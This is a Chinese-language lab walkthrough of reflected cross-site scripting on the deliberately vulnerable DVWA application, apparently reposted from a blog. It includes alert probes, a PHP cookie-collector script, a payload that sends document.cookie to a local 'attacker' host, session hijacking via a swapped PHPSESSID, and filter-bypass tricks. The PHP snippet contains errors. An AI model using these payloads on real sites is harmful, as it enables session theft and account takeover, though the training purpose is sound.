DVWA-xss反射型(跨站腳本漏洞)


首先進入DVWA頁面,選擇low等級。

進入xxs(reflect)頁面。

我們在彈窗中進行測試,輸入xxs則結果如下:

然后再輸入<xss>xss腳本試一試。結果如下:

查看元素發現helllo后面出現一對xss標簽,似乎可以html注入。

接下來我們進行xss彈窗測試,能彈窗則存在xss漏洞。

我們先輸入xss則在URL中顯示name=xss

那我們讓name=<script>alert(/xss/)</script>則結果如下:

注:可以彈窗的函數有alert(),confirm(),prompt()

xss攻擊思路:

主要有四方:用戶,被攻擊的web服務器,攻擊者,攻擊者的web服務器

首先進行攻擊者的web設計

我們就用下面這個URL http://127.0.0.1/cookie.php

在wamp的www目錄下創建一個cookie.php文件,內容如下:

<?php

$cookie=$_GET['$cookie'];//將get請求參數存儲到cookie變量中

$file_put_contents('cookie.txt',$cookie);//把偷取的用戶cookie寫到cookie.txt文件中。

?>

構造攻擊js

<script>document.location='http://127.0.0.1/cookie.php/?cookie='+document.cookie;</script>

//document.location將頁面的內容指定到指定位置。

構造並發送攻擊URL

http://localhost:8080/DVWA-master/vulnerabilities/xss_r/?name=<script>document.location='http://127.0.0.1/cookie.php/?cookie='+document.cookie:</script># //要對參數進行URL編碼

獲得cookie.txt,我們訪問cookie.txt

 

 

PHPSESSID是被攻擊者的登錄憑證。

F12調出cookie右鍵點擊編輯把PHPSESSEN換成我們獲取的。

然后訪問DVWA的index.php,則就以管理員的身份進入,如下圖

 注:防止script標簽被過濾掉可以用大小寫交替如<ScRiPt></ScRiPt>,還可以用img標簽如<img src=x onerror=alert(1)>


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM